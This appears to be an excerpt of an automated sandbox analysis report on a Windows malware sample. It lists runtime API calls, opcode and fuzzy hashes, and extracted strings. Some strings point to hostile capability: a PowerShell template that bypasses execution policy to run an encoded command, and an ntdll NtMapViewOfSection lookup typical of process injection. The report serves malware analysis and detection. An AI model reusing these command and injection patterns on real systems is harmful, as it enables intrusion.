                                                                  Strings
                                                                  • HTTP/1.1 200 OKContent-Type: application/octet-streamContent-Length: %d, xrefs: 0067F044
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _errnomalloc$_callnewh$AllocHeap_invalid_parameter_noinfo_snprintf
                                                                  • String ID: HTTP/1.1 200 OKContent-Type: application/octet-streamContent-Length: %d
                                                                  • API String ID: 3518644649-2739389480
                                                                  • Opcode ID: afba7a99536ed02a45dac5d500ee5d86b7940ec366185a31927e6e9a708e28fc
                                                                  • Instruction ID: e4aaa5cf7ec710a51765eb7b204984538c75f910b742846cdf55e64eaa3db872
                                                                  • Opcode Fuzzy Hash: afba7a99536ed02a45dac5d500ee5d86b7940ec366185a31927e6e9a708e28fc
                                                                  • Instruction Fuzzy Hash: 8B01D231705B9046DA84DB92B804B19769AF78CFE0F04822DEFAD47BC6DF38C1418780
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: freemallocstrchr$rand
                                                                  • String ID:
                                                                  • API String ID: 1305919620-0
                                                                  • Opcode ID: f55c98597b31e9256bdda085e271814e8bdd530284bc77f6856305a025606a71
                                                                  • Instruction ID: 4621b4367b0e2598b79348c7eaca8d736ce7e3cd8140e4c037f313f146006020
                                                                  • Opcode Fuzzy Hash: f55c98597b31e9256bdda085e271814e8bdd530284bc77f6856305a025606a71
                                                                  • Instruction Fuzzy Hash: 2961F862608FC481EA269F29A4113EAB7A0EFA5BD4F085215DF8917B65EF3DC14BC700
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: freemallocstrchr$rand
                                                                  • String ID:
                                                                  • API String ID: 1305919620-0
                                                                  • Opcode ID: 5dd9697f37be70f43a9dfb8e879823c33dc0761040d61eac182ad5eba971c26a
                                                                  • Instruction ID: b37816b41801c4281175eb57c47ed9b6b93ee4c20e9b0afe91c745b2bdfa0cfe
                                                                  • Opcode Fuzzy Hash: 5dd9697f37be70f43a9dfb8e879823c33dc0761040d61eac182ad5eba971c26a
                                                                  • Instruction Fuzzy Hash: 5B613A62208FD481EA269F39A4013EAA392EF95BD4F088129DF8D17715EF3DC243D304
                                                                  APIs
                                                                  • malloc.LIBCMT ref: 001A35BD
                                                                    • Part of subcall function 001BE684: _FF_MSGBANNER.LIBCMT ref: 001BE6B4
                                                                    • Part of subcall function 001BE684: _NMSG_WRITE.LIBCMT ref: 001BE6BE
                                                                    • Part of subcall function 001BE684: _callnewh.LIBCMT ref: 001BE6F2
                                                                    • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE6FD
                                                                    • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE708
                                                                  • malloc.LIBCMT ref: 001A35C8
                                                                    • Part of subcall function 001BE684: _callnewh.LIBCMT ref: 001BE718
                                                                    • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE71D
                                                                  • free.LIBCMT ref: 001A36AF
                                                                  • free.LIBCMT ref: 001A36B7
                                                                  • free.LIBCMT ref: 001A36BF
                                                                  • free.LIBCMT ref: 001A36CB
                                                                  • free.LIBCMT ref: 001A36D8
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: free$_errno$_callnewhmalloc
                                                                  • String ID:
                                                                  • API String ID: 2761444284-0
                                                                  • Opcode ID: 3866d312ddc7406d2c13ac3d10959d9d3de063b9a6b1dce899036bf231b32379
                                                                  • Instruction ID: abc562699c1c0602eaef7a062d5cb2216df987cc85915ee2cd16499f8642370d
                                                                  • Opcode Fuzzy Hash: 3866d312ddc7406d2c13ac3d10959d9d3de063b9a6b1dce899036bf231b32379
                                                                  • Instruction Fuzzy Hash: E941F326300791ABDB15DF27A9603AE6761FB6ABC0F444024EF6A47701EF38DA67C700
                                                                  APIs
                                                                  • malloc.LIBCMT ref: 006641BD
                                                                    • Part of subcall function 0067F284: _FF_MSGBANNER.LIBCMT ref: 0067F2B4
                                                                    • Part of subcall function 0067F284: _NMSG_WRITE.LIBCMT ref: 0067F2BE
                                                                    • Part of subcall function 0067F284: HeapAlloc.KERNEL32 ref: 0067F2D9
                                                                    • Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F2F2
                                                                    • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F2FD
                                                                    • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F308
                                                                  • malloc.LIBCMT ref: 006641C8
                                                                    • Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F318
                                                                    • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F31D
                                                                  • free.LIBCMT ref: 006642AF
                                                                  • free.LIBCMT ref: 006642B7
                                                                  • free.LIBCMT ref: 006642BF
                                                                  • free.LIBCMT ref: 006642CB
                                                                  • free.LIBCMT ref: 006642D8
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: free$_errno$_callnewhmalloc$AllocHeap
                                                                  • String ID:
                                                                  • API String ID: 996410232-0
                                                                  • Opcode ID: 6118db362e25067081320d314af47720c2282f168c26b715ed83619844a1cd4b
                                                                  • Instruction ID: 2d4a88687e5d7507016a98631cb0bebce9c8d6f38e5837d614730d00a0240c0c
                                                                  • Opcode Fuzzy Hash: 6118db362e25067081320d314af47720c2282f168c26b715ed83619844a1cd4b
                                                                  • Instruction Fuzzy Hash: 074134323047828BDB59DBA699607AB275AFB49BC0F604124EF1A47B05DF38DA62C704
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: htonl$freemalloc
                                                                  • String ID: zyxwvutsrqponmlk
                                                                  • API String ID: 1249573706-3884694604
                                                                  • Opcode ID: 71d646e4bb8b7e31db9a3308653b2d67bec3fe39b167032709c668510024000a
                                                                  • Instruction ID: 71bde60fd73a793298d6e4adf1f89da9c9d25217c6deb7eab5dc2c0ca77e50fb
                                                                  • Opcode Fuzzy Hash: 71d646e4bb8b7e31db9a3308653b2d67bec3fe39b167032709c668510024000a
                                                                  • Instruction Fuzzy Hash: CC21373230078046DB94EBB6E56132D6AD3AB89BD0F04803CEE5E87B5BEE3CC5468344
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32 ref: 00673FE7
                                                                  • GetProcAddress.KERNEL32 ref: 00673FF7
                                                                  • GetLastError.KERNEL32 ref: 006740BF
                                                                    • Part of subcall function 0067CC00: GetCurrentProcess.KERNEL32 ref: 0067CC8D
                                                                    • Part of subcall function 0067D134: GetCurrentProcess.KERNEL32 ref: 0067D161
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CurrentProcess$AddressErrorHandleLastModuleProc
                                                                  • String ID: NtMapViewOfSection$ntdll.dll
                                                                  • API String ID: 1006775078-3170647572
                                                                  • Opcode ID: 4efd516be26a68cc1ab5fab53fe02ed59a35285f2b4b3cec42098ec83d9277dd
                                                                  • Instruction ID: 40f3ebebb26c67e1b7042a69d92add0a9986f91f53ff5cdcb4679804f439bff7
                                                                  • Opcode Fuzzy Hash: 4efd516be26a68cc1ab5fab53fe02ed59a35285f2b4b3cec42098ec83d9277dd
                                                                  • Instruction Fuzzy Hash: 3B31EF32710B4482EB10DB22E45976A73A2F788BB4F048329EF6D07B95DF3DC4468B44
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153200610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.4153182678.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153218366.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153247097.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153288325.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153309084.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153329691.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_P3KxDOMmD3.jbxd
                                                                  Similarity
                                                                  • API ID: signal
                                                                  • String ID: CCG
                                                                  • API String ID: 1946981877-1584390748
                                                                  • Opcode ID: 648addc203ed1b4cbdb7cdbf4c8cfef0a20b4c864bfebc609ca8e68908cbbe4c
                                                                  • Instruction ID: 293b1a304c256a7ee66eff26b1d91746a270e19344e3818b9830088d28418f87
                                                                  • Opcode Fuzzy Hash: 648addc203ed1b4cbdb7cdbf4c8cfef0a20b4c864bfebc609ca8e68908cbbe4c
                                                                  • Instruction Fuzzy Hash: 1421A171B0154146EE396279865D33B10019B9A374F284E379A3DA73E0DAFECCC2830E
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: strtok$_getptd_time64malloc
                                                                  • String ID: eThreadpoolTimer
                                                                  • API String ID: 1522986614-2707337283
                                                                  • Opcode ID: b02d7519bf37bc4b38ca8186062a8fc85f913fef5048514e0fa6af22142f2d69
                                                                  • Instruction ID: 6b6eb52b04a315c801423870f2c32a99ef6710bb137d619f24a896f26e01ed9d
                                                                  • Opcode Fuzzy Hash: b02d7519bf37bc4b38ca8186062a8fc85f913fef5048514e0fa6af22142f2d69
                                                                  • Instruction Fuzzy Hash: F921D6B2A14BD485DB10DF52E0886AD77A8F7A8FE4B16426AEF5A83B41CF74C441C780
                                                                  APIs
                                                                  • malloc.LIBCMT ref: 001B13D2
                                                                    • Part of subcall function 001BE684: _FF_MSGBANNER.LIBCMT ref: 001BE6B4
                                                                    • Part of subcall function 001BE684: _NMSG_WRITE.LIBCMT ref: 001BE6BE
                                                                    • Part of subcall function 001BE684: _callnewh.LIBCMT ref: 001BE6F2
                                                                    • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE6FD
                                                                    • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE708
                                                                  • _snprintf.LIBCMT ref: 001B13F1
                                                                    • Part of subcall function 001BEA3C: _errno.LIBCMT ref: 001BEA73
                                                                    • Part of subcall function 001BEA3C: _invalid_parameter_noinfo.LIBCMT ref: 001BEA7E
                                                                  • remove.LIBCMT ref: 001B13FD
                                                                  • remove.LIBCMT ref: 001B1404
                                                                  Strings
                                                                  • uld not open process: %d (%u), xrefs: 001B13D7
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _errno$remove$_callnewh_invalid_parameter_noinfo_snprintfmalloc
                                                                  • String ID: uld not open process: %d (%u)
                                                                  • API String ID: 2566950902-823969559
                                                                  • Opcode ID: fcd4f31b16295b3d981e03ccf995d44eb940f919008a0e94d9d9162e5faefa64
                                                                  • Instruction ID: a95d3efaa90c2af15f19040f1059ad5b508e251585c17898fc7696caa37f8ee5
                                                                  • Opcode Fuzzy Hash: fcd4f31b16295b3d981e03ccf995d44eb940f919008a0e94d9d9162e5faefa64
                                                                  • Instruction Fuzzy Hash: 6DF08261604B90D9D604AB12B8113EAB364E7A8FD0F9D4535FF8917B1ADF3CC5518744
                                                                  APIs
                                                                  • malloc.LIBCMT ref: 00671FD2
                                                                    • Part of subcall function 0067F284: _FF_MSGBANNER.LIBCMT ref: 0067F2B4
                                                                    • Part of subcall function 0067F284: _NMSG_WRITE.LIBCMT ref: 0067F2BE
                                                                    • Part of subcall function 0067F284: HeapAlloc.KERNEL32 ref: 0067F2D9
                                                                    • Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F2F2
                                                                    • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F2FD
                                                                    • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F308
                                                                  • _snprintf.LIBCMT ref: 00671FF1
                                                                    • Part of subcall function 0067F63C: _errno.LIBCMT ref: 0067F673
                                                                    • Part of subcall function 0067F63C: _invalid_parameter_noinfo.LIBCMT ref: 0067F67E
                                                                  • remove.LIBCMT ref: 00671FFD
                                                                  • remove.LIBCMT ref: 00672004
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _errno$remove$AllocHeap_callnewh_invalid_parameter_noinfo_snprintfmalloc
                                                                  • String ID: %s\%s
                                                                  • API String ID: 1896346573-4073750446
                                                                  • Opcode ID: 6cb8594f6045d264f6437138ccf0bddfe367ceba4f17556bef63a27e1bb3b346
                                                                  • Instruction ID: e0e2b8aff05c8fda56302a13f39a6380ebc104d91b613d64687b117b274513b1
                                                                  • Opcode Fuzzy Hash: 6cb8594f6045d264f6437138ccf0bddfe367ceba4f17556bef63a27e1bb3b346
                                                                  • Instruction Fuzzy Hash: 10F0E925208740C6D350AB51B81036AB366E784FC0F588134BF8C5BB16CE38C5528748
                                                                  APIs
                                                                  • _snprintf.LIBCMT ref: 001ADB25
                                                                    • Part of subcall function 001BEA3C: _errno.LIBCMT ref: 001BEA73
                                                                    • Part of subcall function 001BEA3C: _invalid_parameter_noinfo.LIBCMT ref: 001BEA7E
                                                                    • Part of subcall function 001B6F38: _snprintf.LIBCMT ref: 001B70A5
                                                                  • _snprintf.LIBCMT ref: 001ADBBD
                                                                    • Part of subcall function 001B2170: strchr.LIBCMT ref: 001B21D6
                                                                    • Part of subcall function 001B2170: _snprintf.LIBCMT ref: 001B220C
                                                                    • Part of subcall function 001B200C: strchr.LIBCMT ref: 001B2069
                                                                    • Part of subcall function 001B200C: _snprintf.LIBCMT ref: 001B20B3
                                                                  • _snprintf.LIBCMT ref: 001ADBD4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _snprintf$strchr$_errno_invalid_parameter_noinfo
                                                                  • String ID: /'); %s$rshell -nop -exec bypass -EncodedCommand "%s"
                                                                  • API String ID: 199363273-1250630670
                                                                  • Opcode ID: 6e2045361780fadf1587795c869fcd23f7db7a84374f415de51a140654aa30c6
                                                                  • Instruction ID: 8d1d6e67d711b555cd00468b91f0abeea9f9fc8cd94810074212e067c41a4b5e
                                                                  • Opcode Fuzzy Hash: 6e2045361780fadf1587795c869fcd23f7db7a84374f415de51a140654aa30c6
                                                                  • Instruction Fuzzy Hash: AD61BD36700B8596EB10DF62E8907EEB3A5F799B98F804126EE8E57B58DF78C505C700
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 59c4576cc3bafda9519a74292b63c923cc8fd4fa7f2b0ae73700a3254d899919
                                                                  • Instruction ID: f2c5bbf88da8a699e662fc6f765ffd5b0472a53531a90afa3896da39091dbb55
                                                                  • Opcode Fuzzy Hash: 59c4576cc3bafda9519a74292b63c923cc8fd4fa7f2b0ae73700a3254d899919
                                                                  • Instruction Fuzzy Hash: 1651E063B04A40D6EF40EB75D4412ED6362FB95B88F80D129EE0E2771AEF38D64AC744
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _errno_fileno_flsbuf_flush_getptd_noexit_invalid_parameter_noinfo
                                                                  • String ID:
                                                                  • API String ID: 1640621425-0
                                                                  • Opcode ID: f714c1e563aa58d873e3883a1df435710c86d18d380f096712ab5731ea4c4750
                                                                  • Instruction ID: 48bfcc009182e69847d8196810102ae09eb5fa0f863c87d3263119f74cd34897
                                                                  • Opcode Fuzzy Hash: f714c1e563aa58d873e3883a1df435710c86d18d380f096712ab5731ea4c4750
                                                                  • Instruction Fuzzy Hash: 1831062130074486DE2C9E63DE506AAB651F754FE4F18863CDE6A47B91EB78D8878340
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _errno_fileno_flsbuf_flush_getptd_noexit_invalid_parameter_noinfo
                                                                  • String ID:
                                                                  • API String ID: 1640621425-0
                                                                  • Opcode ID: 09bfc7a718d0a166204737d50e50cc52c68c3e2e3a0cecd9edcc1235780d4021
                                                                  • Instruction ID: 5dfa00621e6b32b7e7e6c45174b9e572d81259c5b26a8d18c8109948671366af
                                                                  • Opcode Fuzzy Hash: 09bfc7a718d0a166204737d50e50cc52c68c3e2e3a0cecd9edcc1235780d4021
                                                                  • Instruction Fuzzy Hash: FC314E3230074047FFA8BE63555025EB653BB94FE0F188B249F6647B91E778D49A8744
                                                                  APIs
                                                                  • malloc.LIBCMT ref: 001A493A
                                                                    • Part of subcall function 001BE684: _FF_MSGBANNER.LIBCMT ref: 001BE6B4
                                                                    • Part of subcall function 001BE684: _NMSG_WRITE.LIBCMT ref: 001BE6BE
                                                                    • Part of subcall function 001BE684: _callnewh.LIBCMT ref: 001BE6F2
                                                                    • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE6FD
                                                                    • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE708
                                                                  • malloc.LIBCMT ref: 001A4945
                                                                    • Part of subcall function 001BE684: _callnewh.LIBCMT ref: 001BE718
                                                                    • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE71D
                                                                  • free.LIBCMT ref: 001A4A2C
                                                                  • free.LIBCMT ref: 001A4A34
                                                                  • free.LIBCMT ref: 001A4A40
                                                                  • free.LIBCMT ref: 001A4A4D
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: free$_errno$_callnewhmalloc
                                                                  • String ID:
                                                                  • API String ID: 2761444284-0
                                                                  • Opcode ID: 326b315c93b4297f8d1cd44fbd3c536e1a3741d65750285d3f659b19031d268f
                                                                  • Instruction ID: ddfe11bee21fe91fe2ede919e1d28a075b0ed0327b27eca2dde5050658343c14
                                                                  • Opcode Fuzzy Hash: 326b315c93b4297f8d1cd44fbd3c536e1a3741d65750285d3f659b19031d268f
                                                                  • Instruction Fuzzy Hash: EA31D0263147D587DF15DB2AA4107AE6B99FBE6BC8F0A8024DD568B711EF78C807C304
                                                                  APIs
                                                                  • malloc.LIBCMT ref: 0066553A
                                                                    • Part of subcall function 0067F284: _FF_MSGBANNER.LIBCMT ref: 0067F2B4
                                                                    • Part of subcall function 0067F284: _NMSG_WRITE.LIBCMT ref: 0067F2BE
                                                                    • Part of subcall function 0067F284: HeapAlloc.KERNEL32 ref: 0067F2D9
                                                                    • Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F2F2
                                                                    • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F2FD
                                                                    • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F308
                                                                  • malloc.LIBCMT ref: 00665545
                                                                    • Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F318
                                                                    • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F31D
                                                                  • free.LIBCMT ref: 0066562C
                                                                  • free.LIBCMT ref: 00665634
                                                                  • free.LIBCMT ref: 00665640
                                                                  • free.LIBCMT ref: 0066564D
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: free$_errno$_callnewhmalloc$AllocHeap
                                                                  • String ID:
                                                                  • API String ID: 996410232-0
                                                                  • Opcode ID: de79741046cbe64d3bb630df06faae11b500053710235a4762571f6057312210
                                                                  • Instruction ID: fa91a802676de7115477e7ecbe885dc73ce57f5083dfd6623bbf0d32d29fbd00
                                                                  • Opcode Fuzzy Hash: de79741046cbe64d3bb630df06faae11b500053710235a4762571f6057312210
                                                                  • Instruction Fuzzy Hash: 2E31F032304B8546EB16DB6A980176B6B5BF795BC8F898034DD5ACB722EE38C946C300
                                                                  APIs
                                                                    • Part of subcall function 006731F4: strchr.LIBCMT ref: 0067322E
                                                                    • Part of subcall function 006731F4: strchr.LIBCMT ref: 0067324C
                                                                    • Part of subcall function 006731F4: malloc.LIBCMT ref: 00673264
                                                                    • Part of subcall function 006731F4: malloc.LIBCMT ref: 00673271
                                                                    • Part of subcall function 006731F4: rand.LIBCMT ref: 0067333D
                                                                  • strchr.LIBCMT ref: 00672DD6
                                                                  • _snprintf.LIBCMT ref: 00672E0C
                                                                    • Part of subcall function 0067F63C: _errno.LIBCMT ref: 0067F673
                                                                    • Part of subcall function 0067F63C: _invalid_parameter_noinfo.LIBCMT ref: 0067F67E
                                                                  • _snprintf.LIBCMT ref: 00672E23
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: strchr$_snprintfmalloc$_errno_invalid_parameter_noinforand
                                                                  • String ID: %s&%s$?%s
                                                                  • API String ID: 1095232423-1750478248
                                                                  • Opcode ID: 7c8d9433ae2b1aa8ac26fc6f099732b3782b91ff34ed5625b9a0d50b015d32b5
                                                                  • Instruction ID: 1fe48212a70a43d23a9b5d68317c628ddc730258e810a59962683c7a904eb9b7
                                                                  • Opcode Fuzzy Hash: 7c8d9433ae2b1aa8ac26fc6f099732b3782b91ff34ed5625b9a0d50b015d32b5
                                                                  • Instruction Fuzzy Hash: 92419262204E8191EA119F2ED1552E8A3B2FF98B99F089526DF8D57B20EF34D1B2C340
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::__errno_isleadbyte_l
                                                                  • String ID:
                                                                  • API String ID: 2998201375-0
                                                                  • Opcode ID: bc69b486777a6b9bad5038bbf0975aad08e47f38b0eed12a125a0790956d64d5
                                                                  • Instruction ID: 0be63cf8f76dd2de07813188870e01f120d0accea70a650f284de5b6bec00889
                                                                  • Opcode Fuzzy Hash: bc69b486777a6b9bad5038bbf0975aad08e47f38b0eed12a125a0790956d64d5
                                                                  • Instruction Fuzzy Hash: 8631A03220578086EB60AF55E580769BB66FB85FD0F188326EF8997F65DB38C881C701
                                                                  APIs
                                                                  • malloc.LIBCMT ref: 001AF085
                                                                    • Part of subcall function 001BE684: _FF_MSGBANNER.LIBCMT ref: 001BE6B4
                                                                    • Part of subcall function 001BE684: _NMSG_WRITE.LIBCMT ref: 001BE6BE
                                                                    • Part of subcall function 001BE684: _callnewh.LIBCMT ref: 001BE6F2
                                                                    • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE6FD
                                                                    • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE708
                                                                  • free.LIBCMT ref: 001AF0C0
                                                                  • fwrite.LIBCMT ref: 001AF101
                                                                  • fclose.LIBCMT ref: 001AF109
                                                                  • free.LIBCMT ref: 001AF116
                                                                    • Part of subcall function 001BE644: _errno.LIBCMT ref: 001BE664
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _errno$free$_callnewhfclosefwritemalloc
                                                                  • String ID:
                                                                  • API String ID: 1696598829-0
                                                                  • Opcode ID: 1bdd5497ac55f9ceee01cd46502ea43f72165348b95f2b256c95d8f9a827a5ec
                                                                  • Instruction ID: 596a8a54152f7891fa982c53a1485843f2f04b7ac0077e255192b694276bbb64
                                                                  • Opcode Fuzzy Hash: 1bdd5497ac55f9ceee01cd46502ea43f72165348b95f2b256c95d8f9a827a5ec
                                                                  • Instruction Fuzzy Hash: E4118265704B4081DE10F762E5513AE6392EBA5BE4F484239FE6E4BB8ADF3CC5068740
                                                                  APIs
                                                                  • _errno.LIBCMT ref: 001C99FD
                                                                    • Part of subcall function 001C1118: _getptd_noexit.LIBCMT ref: 001C111C
                                                                  • __doserrno.LIBCMT ref: 001C99F5
                                                                    • Part of subcall function 001C10A8: _getptd_noexit.LIBCMT ref: 001C10AC
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _getptd_noexit$__doserrno_errno
                                                                  • String ID:
                                                                  • API String ID: 2964073243-0
                                                                  • Opcode ID: 02e55afb5f5e5304a095475b8354770d2627f5ba6f47f1d288df05a1981eaf7d
                                                                  • Instruction ID: 85ea3803c73946272d53637bb4f04510df937969011ab4b487b9e71251e7dd7d
                                                                  • Opcode Fuzzy Hash: 02e55afb5f5e5304a095475b8354770d2627f5ba6f47f1d288df05a1981eaf7d
                                                                  • Instruction Fuzzy Hash: 9CF0F672751A4484EF092B74C8967AC7251ABB6F32FA6830DD629073D2C77CC8618710
                                                                  APIs
                                                                  • _errno.LIBCMT ref: 0068A5FD
                                                                    • Part of subcall function 00681D18: _getptd_noexit.LIBCMT ref: 00681D1C
                                                                  • __doserrno.LIBCMT ref: 0068A5F5
